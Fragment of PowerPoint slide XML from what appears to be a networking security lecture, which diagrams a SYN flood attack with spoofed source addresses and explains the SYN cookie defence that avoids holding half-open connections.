          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SYNs with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Source IP = Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349195" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3132138" y="5310188"/>
            <a:ext cx="3571875" cy="806450"/>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349196" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-762518">
            <a:off x="3563938" y="5191125"/>
            <a:ext cx="1722437" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SYN-ACKs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349197" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3206750" y="5695950"/>
            <a:ext cx="3606800" cy="842963"/>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349198" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-692829">
            <a:off x="4232275" y="6383338"/>
            <a:ext cx="846138" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349199" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7831138" y="4732338"/>
            <a:ext cx="2730500" cy="1193800"/>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Connection queue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>freed up with </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RST segment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26641" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1016000" y="2438400"/>
            <a:ext cx="2824163" cy="561975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>amateur attack:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349201" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6502400" y="7620000"/>
            <a:ext cx="6223000" cy="1423988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="008000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Expert attack: Use multiple source IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>addresses, each from unresponsive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>addresses.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91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919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91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919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91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919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919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9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93" grpId="0" animBg="1"/>
      <p:bldP spid="349194" grpId="0" animBg="1"/>
      <p:bldP spid="349195" grpId="0" animBg="1"/>
      <p:bldP spid="349196" grpId="0" animBg="1"/>
      <p:bldP spid="349197" grpId="0" animBg="1"/>
      <p:bldP spid="349198" grpId="0" animBg="1"/>
      <p:bldP spid="349199" grpId="0"/>
      <p:bldP spid="34920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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{48DC2865-88FC-4F87-B2FE-19D4F55B5311}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="914400"/>
            <a:ext cx="11476038" cy="16256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SYN flood defense: SYN cookies (1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="758825" y="3700463"/>
            <a:ext cx="11053763" cy="5186362"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When SYN segment arrives, host B calculates function (hash) based on:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Apache example: Source and destination IP addresses and port numbers, and a secret number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host B uses resulting “cookie” for its initial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> # (ISN) in SYNACK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host B does not allocate anything to half-open connection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Does not remember A’s ISN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Does not remember cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="27653" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3203575" y="2520950"/>
          <a:ext cx="869950" cy="739775"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s27695" name="Clip" r:id="rId3" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId3" imgW="1307079" imgH="1083682"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2520950"/>
                        <a:ext cx="869950" cy="739775"/>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7654" name="Object 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8570913" y="2546350"/>
          <a:ext cx="868362" cy="739775"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s27696" name="Clip" r:id="rId5" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId5" imgW="1307079" imgH="1083682"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0913" y="2546350"/>
                        <a:ext cx="868362" cy="739775"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="27655" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3105150" y="3252788"/>
            <a:ext cx="1135063" cy="484187"/>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Host A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27656" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8432800" y="3311525"/>
            <a:ext cx="1147763" cy="484188"/>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Host B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27657" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4165600" y="2749550"/>
            <a:ext cx="4341813" cy="1588"/>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27658" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4235450" y="3065463"/>
            <a:ext cx="4217988" cy="0"/>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27659" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4902200" y="2286000"/>
            <a:ext cx="2173288"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SYN with ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300" baseline="-25000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27660" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4448175" y="3030538"/>
            <a:ext cx="3990975"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SYN-ACK with ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300" baseline="-25000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>= cookie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0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F1621CD8-4929-41C7-B556-9F97A276DCB7}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="838200"/>
            <a:ext cx="11685588" cy="11430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SYN flood defense: SYN cookies (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28676" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="2743200"/>
            <a:ext cx="5775325" cy="6435725"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="ZapfDingbats" pitchFamily="82" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If SYN is legitimate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host A returns ACK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3400">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host B computes same function, verifies  function = ACK # in ACK segment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host B creates socket for connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3400">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Legit connection established without the need for half-open connections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28677" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6578600" y="2667000"/>
            <a:ext cx="5775325" cy="6435725"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="ZapfDingbats" pitchFamily="82" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If SYN-flood attack with spoofed IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>No ACK comes back to B for connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3400">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>No problem: B is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400" u="sng">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> waiting for an ACK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="ZapfDingbats" pitchFamily="82" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3400" u="sng">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3400">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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
